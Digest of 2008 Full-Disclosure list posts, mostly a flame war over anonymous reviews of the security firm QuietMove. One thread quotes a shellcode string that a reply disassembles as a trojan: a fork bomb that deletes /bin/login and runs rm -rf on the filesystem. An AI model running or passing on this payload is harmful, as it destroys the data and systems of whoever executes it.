Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

[Andre Gironda]

On Jan 1, 2008 9:51 PM, reepex <[EMAIL PROTECTED]> wrote:
> ok so they are nothing alike because ptp/hts actually teach you stuff while
> "UPT" was for jokes... so your post was stupid

The joke's on you since you don't have the context.

> I am not a part of secreview but I realize following email threads is very
> complicated for you.

It's not complicated.  I simply just don't care about who you are as
it relates to the thread.  You appear to be attacking the
person/people I'm defending, while at the same time defending the
secreview post.

> So you list 5 tools they use then mention they modify a javascript
> library...  So basically they use automated tools and  are former  web
> developers ... sound pretty hardcore

Javascript is more than just a language for web developers, especially
when utilized in the Hailstorm SmartAttack library, which isn't a
Javascript library.  These are completely different concepts.  It
should also be noted that both Burp Suite and Hailstorm ARC can be
used in manual and hybrid modes... with step-modes and form-trainers.
They can modify their traversals and have tons of extra customization
on top of what other offerings provide... and can customize the
underlying "data-driven" attacks.

Certainly you've read some of Adam Muntner's comments on, say,
ha.ckers.org and other places?

Allow me to pick on someone in the industry for a second: RSnake.

RSnake has an advertisement up on his website that asks, "Which web
application scanner can hack it?" "Check the Oct 15 post for study
results:"
http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/

Most idiots will only read what RSnake / Larry Suto have written, and
will completely miss the comments by Adam Muntner.  Adam not only
eloquently puts down the testing techniques by Larry Suto, but also
makes mention about proper customization of tools and testing outside
of the commercial scanners.

Effectively, Adam Muntner is one of the only people that does
understand this problem that you specifically says that he does not,
and that the secreview challenge seems to care about most of all other
points.

Where was reepex, where was secreview when RSnake and Larry Suto
blundered our industry into submission?  Why pick on a hero like Adam
Muntner instead?  What are you getting out of it?

Worse - RSnake hasn't been called out on this yet - but he has good
reason to promote Larry's paper.  In fact, it may even be a monetary
reason.  In an article for INSECURE Magazine, they interview RSnake
(page 30):
http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf

Question; What web application scanners do you use?

RSnake: [...] my favorite tools in my arsenal (including the manual
ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap,
NTOSpider (commerical), httprint, Cain, sn00per, Absynthe, Sqlninja, a
half dozen Firefox plugins like Webdeveloper, JSView, NoScript,
Greasemonkey etc... and the entire suite of unix utils out there, like
wget, telnet, ncftp, etc.

Notice the only commercial tool listed in NTOSpider.  Coincidence?

Apparently, too much admiration of a single web application security
scanning vendor can be a bad thing.  Larry Suto has only ever worked
with Eric Caso at NTObjectives.

Adam Muntner has been a customer of several CWE-Compatible and
aspiring companies out there.  He has a balanced view of both the
commercial tools and the open-source world, as well as building his
own tools from scratch as the need may be.

> You must be a cissp because you take yourself and the internet very
> seriously. I am pretty sure no one cares about your opinion either.

Wrong again; as always.

Cheers,
Andre

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( F + )

[Andre Gironda]

On Jan 2, 2008 12:17 AM, secreview <[EMAIL PROTECTED]> wrote:
> Regardless, Adam did react to our website comments, and his reaction was as
> follows, verbatim:

Secreview is clearly anything less than professional. I would say this
is a repeat of "InfoSecSellout" if not the exact same people.

> In a Different email Andre lost all credibility with us because he decided
> to directly attack other companies that we've reviewed that received higher
> grades. If you compare the score cards between QuietMove and the other
> company that Andre bashes, you'll see why they got the good grade. Anyway,
> here's what Andre had to say (we'll comment later):

If I know something bad about a company that you gave a good grade to,
I feel the need to bash that company based on your reputation alone.

In other words, since you can't be trusted; I feel the need to offset
any good things you've said by adding my own commentary.

Every security consulting company is unique (have their own unique
good/bad points).  Many are small and as I said before, "fighting just
to stay in business".  If you are going to give poor reviews, I
suggest you write them up and keep them to yourself instead of
publishing them.

For one of the companies that I worked for in the past, we had a
special way of analyzing new products/services.  In our assessments,
we would gather up all of the good points of the best vendors --
instead of focusing on the bad points of vendors that failed our
criteria.

It takes a special kind of asshole to do what you do.  I also believe
that you know this, and only by hiding behind anonymity are you
willing to continue to do what it is that you do.

As far as losing credibility with you, I'm clearly fine with that...
I'll be getting plenty of free beer from others who dislike you.
Maybe your nepotism will pay off with the companies you give good
grades to.  Maybe you'll win a Nobel Prize for your amazing
methodology of rating security consulting companies by their websites,
as well as the scientific method (i.e. using Google to search
mailing-lists for people's names).

Cheers,
Andre

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] here

[Nikolay Kichukov]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Thanks Andrew! Nice catch! ;-)

Cheers,
- -Nikolay

Andrew Farmer wrote:
> On 20 Dec 07, at 18:51, onion ring wrote:
> 
>> char sc[] =
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80"
>>  "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80"
>>  "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42"
>>  "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31"
>>  "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F"
>>  "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F"
>>  "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72"
>>  "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2"
>>  "\x04\x0B\xCD\x80";
> 
> 
> Abbreviated disassembly:
>signal(SIGHUP, SIG_IGN)
>something that looks like a 15-level deep fork() bomb
>something involving kill()
>unlink("/bin/login")
>execve("//bin/rm", {"//bin/rm", "-rff", "*///"})
> 
> You could at least try to obfuscate your constants a little better.  
> That was way too easy.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBR3uGKzFLYVOGGjgXAQLqzwgAo4UyRGOIGKt2rHK32x17Imt5axyJIHQF
+sIq8NsJzw5U5psM63MrxIkKajW2c/THOUIbFR4TaFAt1/ng3covsJHh1iX6bpfN
uD18QTY3FHPIv9LNXoYgtJmLiUBFqY1AWXd5ih1e/LMRa9ZP8KVjv14EnmJom8tP
qL/WEtYjq60reaLpLpowhVLi4q1KKjvC4BoRz7zGmp26As6ah/5HmYpjpsiA7cKg
v7959l4bQsy0QHG6YP+pY8PfQX3KmhFns1yAsQF93TMGx3N8LYa1fdcXkZLrw5nf
L8tI3QZ+Qhu4lck+QzElCtD3sUuB4z/ae+KsJWWJuGoDe7CdrR5Yug==
=bBbH
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Secreview re-review of quietmove ( F ---)

[Adam Muntner]

Andre is a friend but not an employee or representative of the  
business- HOWEVER - There were a number of innacuracies in his  
statements about me. A selection of corrections to statements are below.


- I never ran UPT
- all the speculation about our methodology and pricing was wrong.
- the quantity ofautomated vs hands on testing we perform are based on  
what the customer is willing to pay for. Novel concept. We explain  
carefully what can and can't be found. The customer select their  
apporpriate level of risk acceptce based on the value of the target of  
evaluation and their budget. We always try to go above and beyond.
- our overhead is low-no giant headquarters - we are virtual mostly  
except for a rack cage. We don't have to support a giant marketing  
team and don't do $20k trade show booths. As a result that isn't built  
into our pricing.
- I was never a 'uNIX admin' but did engineer one of the early  
commercially avail Beowulf clusters - in 1998 - and have run some unix  
boxes, meaning it took all of 3 hours a month of my time, but i was  
not a 'unix admin' by any stretch of the imagination. The opennsd  
posts were from what,10 years ago?

More evidence of your poor arithmetic skills from the initial post.
- the website wasn't updated because I am taking a vacation to NYC and  
would rather enjoy myself than meet some 12 hour unmentioned timetable  
to edit the website by an anonymous coward pfy.
- they weren't insults, they were sarcastic though accurate  
representations of you'd subpar ( at best) review capabilities
- others but really, who cares? You are not interested in facts as I  
will prove below.


Your analysis is worthless. Several weeks ago you posted your alleged  
methodology. It included contacting the vendor PRIOR to review, which  
you didnt do. You also didnt notify us of the review. I read it on fd  
myself.


You sent a list of questions on new years day, after you posted the  
review, and half a day later posted your re review without again  
contacting me directly except with a monster list of questions - not  
so much as a phone call. You alleged review was based on list noise,  
not speaking with me.


You still have yet to post your scoring methodology as promised. You  
fail.


Frankly I find the drama and anonymous weenie-waving on this list to  
be tedious. FD is more a running joke than a productive mailing list.  
Save the drama fo yo mama.


On my timetable I'll respond to your questions To the list, not to  
you directly. Frankly I don't trust you to represent them accurately.  
Right now I'm going to visit the metropolitan museum of art, and  
tonight go party - not answer your essay test. Sorry to dissapoint.


As a number of list members commented privately to me - you don't  
deserve the attention.


That said, if you can prove you will follow your own previously stated  
methodology, I'll re review your review system. Following your  
methodology I will post a f--- score in 6-12 hours or maybe  
sooner if you don't respond.


That's a joke, son. ;)

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sorry for typos - sent from my 31337 jailbroken iPhone. It runs unix.  
I guess that makes me a unix admin!


On Jan 2, 2008, at 2:17 AM, secreview <[EMAIL PROTECTED]> wrote:


Our first QuietMove review can be found here.

QuietMove, located at http://www.quietmove.com is a Professional IT  
Security Services company that was founded by Adam Muntner, Jeffrey  
Rassas and James G. (Jim) Garvey, Jr. We’ve already performed one re 
view of QuietMove but Adam Munter and his team didn’t like the revie 
w. As a result, we’ve gone back and revisited our data and are produ 
cing this second, hopefully more accurate review.


Our first point of criticism is still the QuietMove web-site. Their  
services are poorly defined, and even somewhat contradictory. For  
example, under their Penetration Testing section they nearly bash  
the use of Automated tools. Shortly thereafter they go on to say  
that they offer services for nearly the same cost as “cookie- 
cutter” services.


Well, we still have a problem with that.  The overhead cost of using  
quality talent is always going to be far greater than the fees  
charged by vendors that sell automated scanning software. Any time  
someone tells us that they can offer “expert driven” services at  
the same price points or even nearly the same as a “cookie  
cutter” service, we say bullshit.


Taking it a step further, we still stick by our previous opinion  
that the QuietMove website doesn’t have much to offer prospective cu 
stomers in the way of useful information. The services shown are ver 
y poorly defined; the grammar is still horrible, and frankly the web 
site is incomplete. Want to see what we mean, click on their “Social 
 Engineering” tab under their service offerings; you’ll notice  
that there is no description. We hope that their website does not re 
flect the quality

Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

[Adam Muntner]

Just to be clear the corrections to secreview reepex and Andre were  
intermingled.


The ones I mentioned were the ones secreview and reepex, the anonymous  
cowards too embarrassed by their own ignorant commentary to stand  
behind them, called out.


Dre thx for pointing out the ha.ckers.org posts. More evidence of  
secreview selective quotation and/or ability to 'research'


He can't even spell the name of the company he reviews correctly.

Secreview re-re-score-  
f---.


:)

Ho hum!

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 9:32 AM, Adam Muntner <[EMAIL PROTECTED]>  
wrote:


Andre is a friend but not an employee or representative of the  
business- HOWEVER - There were a number of innacuracies in his  
statements about me. A selection of corrections to statements are  
below.


- I never ran UPT
- all the speculation about our methodology and pricing was wrong.
- the quantity ofautomated vs hands on testing we perform are based  
on what the customer is willing to pay for. Novel concept. We  
explain carefully what can and can't be found. The customer select  
their apporpriate level of risk acceptce based on the value of the  
target of evaluation and their budget. We always try to go above and  
beyond.
- our overhead is low-no giant headquarters - we are virtual mostly  
except for a rack cage. We don't have to support a giant marketing  
team and don't do $20k trade show booths. As a result that isn't  
built into our pricing.
- I was never a 'uNIX admin' but did engineer one of the early  
commercially avail Beowulf clusters - in 1998 - and have run some  
unix boxes, meaning it took all of 3 hours a month of my time, but i  
was not a 'unix admin' by any stretch of the imagination. The  
opennsd posts were from what,10 years ago?

More evidence of your poor arithmetic skills from the initial post.
- the website wasn't updated because I am taking a vacation to NYC  
and would rather enjoy myself than meet some 12 hour unmentioned  
timetable to edit the website by an anonymous coward pfy.
- they weren't insults, they were sarcastic though accurate  
representations of you'd subpar ( at best) review capabilities
- others but really, who cares? You are not interested in facts as I  
will prove below.


Your analysis is worthless. Several weeks ago you posted your  
alleged methodology. It included contacting the vendor PRIOR to  
review, which you didnt do. You also didnt notify us of the review.  
I read it on fd myself.


You sent a list of questions on new years day, after you posted the  
review, and half a day later posted your re review without again  
contacting me directly except with a monster list of questions - not  
so much as a phone call. You alleged review was based on list noise,  
not speaking with me.


You still have yet to post your scoring methodology as promised. You  
fail.


Frankly I find the drama and anonymous weenie-waving on this list to  
be tedious. FD is more a running joke than a productive mailing  
list. Save the drama fo yo mama.


On my timetable I'll respond to your questions To the list, not  
to you directly. Frankly I don't trust you to represent them  
accurately. Right now I'm going to visit the metropolitan museum of  
art, and tonight go party - not answer your essay test. Sorry to  
dissapoint.


As a number of list members commented privately to me - you don't  
deserve the attention.


That said, if you can prove you will follow your own previously  
stated methodology, I'll re review your review system. Following  
your methodology I will post a f--- score in 6-12 hours or  
maybe sooner if you don't respond.


That's a joke, son. ;)

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sorry for typos - sent from my 31337 jailbroken iPhone. It runs  
unix. I guess that makes me a unix admin!


On Jan 2, 2008, at 2:17 AM, secreview <[EMAIL PROTECTED]> wrote:


Our first QuietMove review can be found here.

QuietMove, located at http://www.quietmove.com is a Professional IT  
Security Services company that was founded by Adam Muntner, Jeffrey  
Rassas and James G. (Jim) Garvey, Jr. We’ve already performed one  
review of QuietMove but Adam Munter and his team didn’t like the r 
eview. As a result, we’ve gone back and revisited our data and are 
 producing this second, hopefully more accurate review.


Our first point of criticism is still the QuietMove web-site. Their  
services are poorly defined, and even somewhat contradictory. For  
example, under their Penetration Testing section they nearly bash  
the use of Automated tools. Shortly thereafter they go on to say  
that they offer services for nearly the same cost as “cookie-cutte 
r” services.


Well, we still have a problem with that. The overhead cost of using  
quality talent is always going to be far greater than the fees  
charge

[Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)

[Peter Dawson]

Adam

I don't recall Rsnake or id posting a review on secreview. Is there a link
you could share ?
tia

/pd

On Jan 2, 2008 9:45 AM, Adam Muntner < [EMAIL PROTECTED]> wrote:

>
>
> Dre thx for pointing out the ha.ckers.org posts. More evidence of
> secreview selective quotation and/or ability to 'research'
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)

[Adam Muntner]

It was a reply to the larry suto review of web app scanners rsnake  
posted. I commented on his blog post. The review was totally worthless.


Adam Muntner
Managing Partner
QuietMove, Inc.
Phone: 602-793-5969
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <[EMAIL PROTECTED]> wrote:



Adam

I don't recall Rsnake or id posting a review on secreview. Is there  
a link you could share ?

tia

/pd

On Jan 2, 2008 9:45 AM, Adam Muntner < [EMAIL PROTECTED]>  
wrote:



Dre thx for pointing out the ha.ckers.org posts. More evidence of  
secreview selective quotation and/or ability to 'research'




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)

[Mukul Dharwadkar]

With all due respect Adam,

You would not have responded to these posts at all if you thought these
reviews were worthless.


On 1/2/08, Adam Muntner <[EMAIL PROTECTED]> wrote:
>
>  It was a reply to the larry suto review of web app scanners rsnake
> posted. I commented on his blog post. The review was totally worthless.
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> Phone: 602-793-5969
> Fax: 866-272-8194
> http://www.quietmove.com
>
>
> Sent from my iPhone
>
> On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <[EMAIL PROTECTED]> wrote:
>
>
>
>
> Adam
>
> I don't recall Rsnake or id posting a review on secreview. Is there a link
> you could share ?
> tia
>
> /pd
>
> On Jan 2, 2008 9:45 AM, Adam Muntner < [EMAIL PROTECTED]> wrote:
>
> >
> >
> >
> > Dre thx for pointing out the ha.ckers.org posts. More evidence of
> > secreview selective quotation and/or ability to 'research'
> >
> >
> >
>
>
>
>
>  ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
Smile!!! :) It improves your face value...

Visit me at
http://www.dharwadkar.com
http://www.dharwadkar.org
Sister Site:
http://www.saraswatibhuvan.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

[SecReview]

Hi Adam, 
   
We've said this before and will say this again, this time to 
everyone. 

We would be more than happy to give your company (QuietMove) a 
"better" review if you'd enable us to do that. So far you haven't 
helped us to effectively review you at all. We tried to call you 
before our initial review, but never got hold of anyone. We also 
sent you an email before writing our second review, and you never 
responded to any of the questions in that email. If you'd like us 
to do a better review then provide us with the information that you 
think we will need to get the job done. 

Our current review is the product of your website, emails that 
you've posted to this and other forums, and your reaction to our 
first review. We haven't been able to find anything related to 
major accomplishments by you or by QuietMove, we haven't seen any 
sample reports, and we haven't received any answers to any 
questions about your methodologies for service execution and 
delivery. We even think that our current review might be too harsh, 
but can't change anything without more information. 

If you want us to change our review, we can do that again and we 
can do it in a non-biased way (regardless of all the rants and 
noise). We need you to tell us about your service delivery 
methodologies, your reporting methodologies, how you define 
specific service offerings, what markets you play in, and if 
possible sanitized sample reports. We won't publish any of that 
information directly, but we would use that to produce your next 
review. 

We want our reviews to accurately and truthfully reflect the 
quality and professionalism of the providers that we study. (In 
fact, if anyone has any suggestions as to how we could better 
"rank" security companies we'd be more than happy to listen and 
consider those suggestions.) 

Hope this helps. This will be our last email about QuietMove unless 
you request a redo of the current review. We will only redo the 
review if you are able to provide us with accurate information to 
help us get it done. We think that you should do it, because we 
think that you can score much better than an F+. (You're clearly 
not an idiot and you do have at least some experience.)

-the end.




Regards, 
  The Secreview Team
  http://secreview.blogspot.com

--
Add warmth and beauty to your home with a new rug.  Click Now.
http://tagline.hushmail.com/fc/Ioyw6h4edu6i9KyFqhMMxsbZ4PNyvCU2wW5JQxc2h8yrTHE4BofBeo/
  Professional IT Security Service Providers - Exposed

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

[Valdis . Kletnieks]

On Tue, 01 Jan 2008 12:33:36 CST, reepex said:

> Is this list up to date?  It makes it seem as if you are learning basic
> linux commands, sed, and basic perl. Also why are you reading operating
> system design and implementation when you do not know C?

C is not a prerequisite for understanding operating systems design. It's only
needed if the particular operating system you're working with implements its
internals in C.

What is more important is understanding the *concepts* - things like locking,
and race conditions, and how fine-grained locking you need/want for a
filesystem. Having one big lock is a lot easier, but causes contention - having
a lot of little locks can cause deadlocks, especially in error handlers.  What
does the filesystem code do if (for example) it gets 2/3 of the way through the
rename of a file, and encounters an I/O error while writing out the removal of
the old name of the file?  What are the trade-offs required for an operating
system to support jitter-free multimedia applications (the first thing to learn
is that throughput, latency, and jitter are intertwined, and it's very
difficult to do all 3 well at the same time)?

It's also important to understand that there are approaches other than Windows
and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and
have a lot to tell us about other choices that can be made.  There's still a
lot of VMS running out there in scattered corners as well - and that system had
a lot of concepts that one should understand, at least well enough to know why
"my favorite system didn't do it that way because..." (Hint - consider how and
why SYS$FOO variables worked in VMS, and why they're so hard to get working
correctly under Linux - they're *not* exactly the same as Unix/Linux
environment variables, and as such provide both problems and solutions that
environment variables don't).

Bonus points for knowing that VMS was mostly written in Bliss/32 or some such,
and VM and MVS were a mixture of assembler and (later on) PL/S.  No C knowledge
needed for those critters...

Even when the system *is* written in C, you don't need to be a C guru to
understand what's going on. Maurice Bach's "The Design of the Unix Operating
System" is probably one of the classic texts - but you don't need to know C any
better than "read C code snippet as pseudocode" to follow it.


pgpMgHGtCPtaX.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Was secreview crap - now OpenVMS!!

[Randal T. Rioux]

>[EMAIL PROTECTED] said:

>Bonus points for knowing that VMS was mostly written in Bliss/32 or some 
>such, and VM and MVS were a mixture of assembler and (later on) PL/S. 
>No C knowledge needed for those critters...

OpenVMS is less than 40% Blissful... though I'm not familiar with the original 
source (wasn't it written on stone tablets?). About 50% is C, with a healthy 
mix of obsoletes making the difference. How something so elegant could be 
spawned from such chaos is beyond me.

Mostly, the VMS basic OS utilities are Bliss-based (think: GNU). 

I really wish HP would open OpenVMS before they kill it.

Security relevance: UNHACKABLE! 

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)

[William Lefkovics]

Anonymous reviews by people who have not used the services of the company
they are reviewing aren't worth the virtual paper they are written on. (even
the name on the site indicates the goal of companies 'exposed' not
'reviewed'.) I am no security expert and would depend on using an external
company for certain security services.  All I have gained from this
discussion is to completely ignore secreview content in making any
determination of companies to call upon for things like penetration testing.

 

I don't know you from . well. Adam.  Your concern is probably that actual
potential clients may read such content and not realize it is drivel. How
about a blog post or something commenting that 'don't be fooled by company
reviews by people who have never tried our services.'? Just curious.

 

 

 

From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Adam Muntner
Sent: Wednesday, January 02, 2008 7:26 AM
To: Peter Dawson
Cc: Full-Disclosure dis
Subject: Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F
---)

 

It was a reply to the larry suto review of web app scanners rsnake posted. I
commented on his blog post. The review was totally worthless.

Adam Muntner

Managing Partner

QuietMove, Inc.

Phone: 602-793-5969

Fax: 866-272-8194

http://www.quietmove.com

 

Sent from my iPhone


On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <[EMAIL PROTECTED]> wrote:

 

Adam

I don't recall Rsnake or id posting a review on secreview. Is there a link
you could share ?
tia

/pd

 

On Jan 2, 2008 9:45 AM, Adam Muntner <  
[EMAIL PROTECTED]> wrote:

 

 

Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview
selective quotation and/or ability to 'research'

 

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

[reepex]

everyone who is not a kiddie knows rsnake is a joke, just like anyone else
involved in his *.ackers group.   If rsnake was to post to places like this
instead of lamer 'hacker'/'security' magazines then he would be ridiculed
off the list like pdp architect was.  Instead I believe rsnake knows hes a
kiddie so he sticks to places with non-technical people and does not involve
himself with people who actually know what they are talking about.

I picked on  Adam Munter mostly because his lame intern decided to spout up
on the list only to end up being a kiddie, and also Adam brought it upon
himself by putting any worth into what secreview says and replying to their
review.


On Jan 2, 2008 12:02 AM, Andre Gironda <[EMAIL PROTECTED]> wrote:

> On Jan 1, 2008 9:51 PM, reepex <[EMAIL PROTECTED]> wrote:
> > ok so they are nothing alike because ptp/hts actually teach you stuff
> while
> > "UPT" was for jokes... so your post was stupid
>
> The joke's on you since you don't have the context.
>
> > I am not a part of secreview but I realize following email threads is
> very
> > complicated for you.
>
> It's not complicated.  I simply just don't care about who you are as
> it relates to the thread.  You appear to be attacking the
> person/people I'm defending, while at the same time defending the
> secreview post.
>
> > So you list 5 tools they use then mention they modify a javascript
> > library...  So basically they use automated tools and  are former  web
> > developers ... sound pretty hardcore
>
> Javascript is more than just a language for web developers, especially
> when utilized in the Hailstorm SmartAttack library, which isn't a
> Javascript library.  These are completely different concepts.  It
> should also be noted that both Burp Suite and Hailstorm ARC can be
> used in manual and hybrid modes... with step-modes and form-trainers.
> They can modify their traversals and have tons of extra customization
> on top of what other offerings provide... and can customize the
> underlying "data-driven" attacks.
>
> Certainly you've read some of Adam Muntner's comments on, say,
> ha.ckers.org and other places?
>
> Allow me to pick on someone in the industry for a second: RSnake.
>
> RSnake has an advertisement up on his website that asks, "Which web
> application scanner can hack it?" "Check the Oct 15 post for study
> results:"
>
> http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/
>
> Most idiots will only read what RSnake / Larry Suto have written, and
> will completely miss the comments by Adam Muntner.  Adam not only
> eloquently puts down the testing techniques by Larry Suto, but also
> makes mention about proper customization of tools and testing outside
> of the commercial scanners.
>
> Effectively, Adam Muntner is one of the only people that does
> understand this problem that you specifically says that he does not,
> and that the secreview challenge seems to care about most of all other
> points.
>
> Where was reepex, where was secreview when RSnake and Larry Suto
> blundered our industry into submission?  Why pick on a hero like Adam
> Muntner instead?  What are you getting out of it?
>
> Worse - RSnake hasn't been called out on this yet - but he has good
> reason to promote Larry's paper.  In fact, it may even be a monetary
> reason.  In an article for INSECURE Magazine, they interview RSnake
> (page 30):
> http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf
>
> Question; What web application scanners do you use?
>
> RSnake: [...] my favorite tools in my arsenal (including the manual
> ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap,
> NTOSpider (commerical), httprint, Cain, sn00per, Absynthe, Sqlninja, a
> half dozen Firefox plugins like Webdeveloper, JSView, NoScript,
> Greasemonkey etc... and the entire suite of unix utils out there, like
> wget, telnet, ncftp, etc.
>
> Notice the only commercial tool listed in NTOSpider.  Coincidence?
>
> Apparently, too much admiration of a single web application security
> scanning vendor can be a bad thing.  Larry Suto has only ever worked
> with Eric Caso at NTObjectives.
>
> Adam Muntner has been a customer of several CWE-Compatible and
> aspiring companies out there.  He has a balanced view of both the
> commercial tools and the open-source world, as well as building his
> own tools from scratch as the need may be.
>
> > You must be a cissp because you take yourself and the internet very
> > seriously. I am pretty sure no one cares about your opinion either.
>
> Wrong again; as always.
>
> Cheers,
> Andre
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

[Valdis . Kletnieks]

On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:

> OpenVMS is less than 40% Blissful...

Obviously, it's migrated over the years.  Back in the late 80's when it
was at its most prevalent (and before it got 'Open' attached to it - we're
talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
Bliss32..

> Security relevance: UNHACKABLE! 

WANK! (The old-timers will know what that means, and it's not what you newbies
think... ;)


pgp2LOICiURNp.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

[reepex]

if you noticed he was reading tanebaum's book about minix. If you would look
at the book you would see he relies heavily on source code and actually has
the code in the back of the book so that he can refer to it constantly. In
other books i agree you do not have to know C, but for this book, if you do
not know C, you will end up understanding at a very very high level what
message passing is and thats about it.

On Jan 2, 2008 12:39 PM, <[EMAIL PROTECTED]> wrote:

> On Tue, 01 Jan 2008 12:33:36 CST, reepex said:
>
> > Is this list up to date?  It makes it seem as if you are learning basic
> > linux commands, sed, and basic perl. Also why are you reading operating
> > system design and implementation when you do not know C?
>
> C is not a prerequisite for understanding operating systems design. It's
> only
> needed if the particular operating system you're working with implements
> its
> internals in C.
>
> What is more important is understanding the *concepts* - things like
> locking,
> and race conditions, and how fine-grained locking you need/want for a
> filesystem. Having one big lock is a lot easier, but causes contention -
> having
> a lot of little locks can cause deadlocks, especially in error handlers.
>  What
> does the filesystem code do if (for example) it gets 2/3 of the way
> through the
> rename of a file, and encounters an I/O error while writing out the
> removal of
> the old name of the file?  What are the trade-offs required for an
> operating
> system to support jitter-free multimedia applications (the first thing to
> learn
> is that throughput, latency, and jitter are intertwined, and it's very
> difficult to do all 3 well at the same time)?
>
> It's also important to understand that there are approaches other than
> Windows
> and Unix/Linux - IBM's VM and MVS systems have been around for a long
> time, and
> have a lot to tell us about other choices that can be made.  There's still
> a
> lot of VMS running out there in scattered corners as well - and that
> system had
> a lot of concepts that one should understand, at least well enough to know
> why
> "my favorite system didn't do it that way because..." (Hint - consider how
> and
